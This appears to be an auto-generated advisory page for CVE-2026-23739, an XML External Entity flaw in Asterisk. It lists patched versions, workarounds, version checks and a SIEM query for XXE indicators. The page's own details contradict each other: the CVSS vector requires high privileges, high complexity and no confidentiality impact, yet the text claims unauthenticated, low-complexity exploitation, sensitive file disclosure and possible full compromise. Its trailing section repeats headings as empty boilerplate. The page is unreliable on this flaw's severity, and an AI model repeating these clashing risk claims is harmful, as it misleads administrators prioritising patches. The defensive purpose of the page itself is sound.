CVE-2026-23739 – This CVE describes an XML External Entity (XXE)... (How to Fix)

Q: What is the severity of CVE-2026-23739?

CVE-2026-23739 has a CVSS score of 2.0 (LOW). This CVE describes an XML External Entity (XXE) vulnerability in Asterisk's XML parsing function. It allows attackers to read sensitive files from the host system when untrusted XML is processed. Affected systems are Asterisk installations prior to patched versions that parse user-supplied XML.

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in Asterisk's XML parsing function. It allows attackers to read sensitive files from the host system when untrusted XML is processed. Affected systems are Asterisk installations prior to patched versions that parse user-supplied XML.

💻 Affected Systems

Products:

Asterisk

Versions: All versions prior to 20.7-cert9, 20.18.2, 21.12.1, 22.8.2, and 23.2.2

Operating Systems: All operating systems running Asterisk

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists when Asterisk processes XML files, which may occur through various telephony features or integrations.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete disclosure of sensitive host files including configuration files, credentials, and system information leading to full system compromise.

🟠

Likely Case

Limited file disclosure from the Asterisk process context, potentially exposing configuration files and telephony-related data.

🟢

If Mitigated

No impact if XML parsing is restricted to trusted sources or the vulnerability is patched.

🌐 Internet-Facing: MEDIUM - Requires XML input to be processed, which may occur through certain telephony interfaces or web APIs.

🏢 Internal Only: MEDIUM - Internal users with access to XML input mechanisms could exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires the ability to supply XML input to Asterisk's XML parsing functions, which may be available through various interfaces.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 20.7-cert9, 20.18.2, 21.12.1, 22.8.2, or 23.2.2 depending on your branch

Vendor Advisory: https://github.com/asterisk/asterisk/security/advisories/GHSA-85x7-54wr-vh42

Restart Required: Yes

Instructions:

1. Identify your Asterisk version. 2. Upgrade to the appropriate patched version for your branch. 3. Restart Asterisk service. 4. Verify the fix is applied.

🔧 Temporary Workarounds

Disable XML processing

all

If XML features are not required, disable XML parsing functionality in Asterisk configuration.

# Review and modify Asterisk configuration to disable XML-related modules and features

Restrict XML input sources

all

Ensure only trusted, validated XML sources are processed by Asterisk.

# Configure Asterisk to only accept XML from trusted sources and implement input validation

🧯 If You Can't Patch

Implement strict input validation and sanitization for all XML input to Asterisk
Use network segmentation to isolate Asterisk systems and restrict access to sensitive files

🔍 How to Verify

Check if Vulnerable:

Check Asterisk version with 'asterisk -V' and compare against affected versions list.

Check Version:

asterisk -V

Verify Fix Applied:

Verify version is 20.7-cert9, 20.18.2, 21.12.1, 22.8.2, or 23.2.2 or newer using 'asterisk -V'.

📡 Detection & Monitoring

Log Indicators:

Unusual XML parsing errors
File access attempts from Asterisk process
Large XML document processing

Network Indicators:

XML payloads containing external entity references or XInclude directives sent to Asterisk

SIEM Query:

source="asterisk.log" AND ("xml" OR "XXE" OR "XInclude")

📊 Metadata

CVE ID: CVE-2026-23739

CVSS v3 Score: 2.0 (LOW)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N

CWE: CWE-611

EPSS Score: 0.11% exploit probability (28.7th percentile)

Published: February 6, 2026

Last Updated: February 18, 2026

🔗 References

https://github.com/asterisk/asterisk/security/advisories/GHSA-85x7-54wr-vh42 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-23739, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Asterisk by Sangoma

Asterisk by Sangoma

Asterisk by Sangoma

Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

Certified Asterisk by Sangoma

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Disable XML processing

Restrict XML input sources

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities